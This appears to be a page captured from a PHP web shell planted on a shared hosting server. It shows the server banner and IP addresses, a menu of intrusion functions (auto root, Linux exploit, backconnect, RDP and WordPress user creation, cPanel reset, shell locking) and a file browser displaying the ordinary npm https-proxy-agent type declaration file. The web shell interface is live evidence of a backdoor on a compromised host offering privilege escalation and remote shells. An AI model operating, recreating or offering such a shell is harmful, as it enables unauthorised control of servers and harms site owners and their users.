Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 3.22.75.223
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
alt /
alt-nodejs16 /
root /
usr /
lib /
node_modules /
npm /
node_modules.bundled /
https-proxy-agent /
dist /
[ HOME SHELL ]
Name
Size
Permission
Action
agent.d.ts
1.1
KB
-rw-r--r--
agent.js
7.66
KB
-rw-r--r--
agent.js.map
4.26
KB
-rw-r--r--
index.d.ts
970
B
-rw-r--r--
index.js
579
B
-rw-r--r--
index.js.map
362
B
-rw-r--r--
parse-proxy-response.d.ts
233
B
-rw-r--r--
parse-proxy-response.js
2.4
KB
-rw-r--r--
parse-proxy-response.js.map
1.86
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : agent.d.ts
/// <reference types="node" /> import net from 'net'; import { Agent, ClientRequest, RequestOptions } from 'agent-base'; import { HttpsProxyAgentOptions } from '.'; /** * The `HttpsProxyAgent` implements an HTTP Agent subclass that connects to * the specified "HTTP(s) proxy server" in order to proxy HTTPS requests. * * Outgoing HTTP requests are first tunneled through the proxy server using the * `CONNECT` HTTP request method to establish a connection to the proxy server, * and then the proxy server connects to the destination target and issues the * HTTP request from the proxy server. * * `https:` requests have their socket connection upgraded to TLS once * the connection to the proxy server has been established. * * @api public */ export default class HttpsProxyAgent extends Agent { private secureProxy; private proxy; constructor(_opts: string | HttpsProxyAgentOptions); /** * Called when the node-core HTTP client library is creating a * new HTTP request. * * @api protected */ callback(req: ClientRequest, opts: RequestOptions): Promise<net.Socket>; }
Close